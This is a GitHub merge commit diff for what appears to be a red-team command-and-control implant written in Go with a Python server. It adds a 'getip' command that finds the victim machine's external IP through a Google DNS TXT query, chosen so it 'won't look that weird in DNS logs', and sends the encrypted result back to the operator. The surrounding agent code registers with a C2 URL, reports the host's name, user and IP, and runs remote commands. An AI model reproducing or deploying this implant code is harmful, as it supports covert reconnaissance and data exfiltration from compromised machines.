Merge pull request #9 from sporkmonger/ip-address-cmd

Take 2: IP address cmd
Coalfire-Research · Jul 1, 2019 · 76c36ef · 76c36ef
2 parents fd6e3a5 + c329809
commit 76c36ef
Show file tree

Hide file tree

Showing 3 changed files with 35 additions and 3 deletions.
diff --git a/agent.go b/agent.go
@@ -31,6 +31,7 @@ import (
 
 	"github.com/atotto/clipboard"
 	"github.com/kbinani/screenshot"
+	"github.com/miekg/dns"
 	"golang.org/x/sys/windows"
 )
 
@@ -977,7 +978,7 @@ func PKCS5UnPadding(origData []byte) []byte { //Used for Crypto
 	return origData[:(length - unpadding)]
 }
 
-func GetOutboundIP() string { // Get preferred outbound ip of this machine
+func GetLANOutboundIP() string { // Get preferred outbound ip of this machine
 	conn, err := net.Dial("udp", "4.5.6.7:1337") //This doesn't actually make a connection
 	if err != nil {
 		log.Fatal(err)
@@ -989,6 +990,29 @@ func GetOutboundIP() string { // Get preferred outbound ip of this machine
 
 }
 
+func GetWANOutboundIP() string { // Get external WAN outbound ip of this machine
+	// high speed response, won't look that weird in DNS logs
+	target := "o-o.myaddr.l.google.com"
+	server := "ns1.google.com"
+
+	c := dns.Client{}
+	m := dns.Msg{}
+	m.SetQuestion(target+".", dns.TypeTXT)
+	r, _, err := c.Exchange(&m, server+":53")
+	if err != nil {
+		return ""
+	}
+	if len(r.Answer) == 0 {
+		return ""
+	}
+	for _, ans := range r.Answer {
+		TXTrecord := ans.(*dns.TXT)
+		// shouldn't ever be multiple, but provide the full answer if we ever do
+		return strings.Join(TXTrecord.Txt, ",")
+	}
+	return ""
+}
+
 func whoami() string { // returns the current user
 	user, err := user.Current()
 	if err != nil {
@@ -1566,7 +1590,7 @@ func Register(client_ID string) { // Send a message to the registration channel
 	} else {
 		user = whoami()
 	}
-	info := client_ID + ":" + name + ":" + user + ":" + GetOutboundIP() + ":" + string(getVersion())
+	info := client_ID + ":" + name + ":" + user + ":" + GetLANOutboundIP() + ":" + string(getVersion())
 	v.Set("text", info)
 	//pass the values to the request's body
 	req, err := http.NewRequest("POST", URL, strings.NewReader(v.Encode()))
@@ -1903,6 +1927,11 @@ func RunCommand(client_id, job_id, command string) { //This receives a command t
 			encryptedOutput, _ := Encrypt([]byte(ifconfig))
 			SendResult(client_id, job_id, "output", encryptedOutput)
 
+		case "getip":
+			ipaddr := GetWANOutboundIP()
+			encryptedOutput, _ := Encrypt([]byte(ipaddr))
+			SendResult(client_id, job_id, "output", encryptedOutput)
+
 		case "whoami":
 			me := whoami()
 			encryptedOutput, _ := Encrypt([]byte(me))

diff --git a/install.sh b/install.sh
@@ -4,6 +4,7 @@ go get github.com/kbinani/screenshot
 go get github.com/lxn/win
 go get golang.org/x/sys/windows
 go get github.com/atotto/clipboard
+go get github.com/miekg/dns
 pip3 install -r requirements.txt
 cd impacket
-python setup.py install
+python setup.py install
diff --git a/server.py b/server.py
@@ -1135,6 +1135,8 @@ def do_modules(self, arg):
            Usage: hostname
 ifconfig - Displays interface information
            Usage: ifconfig
+getip - Get external IP address (makes a DNS request)
+           Usage: getip
 ls - list directory contents
            Usage: ls [DIRECTORY]
 find - search directory filenames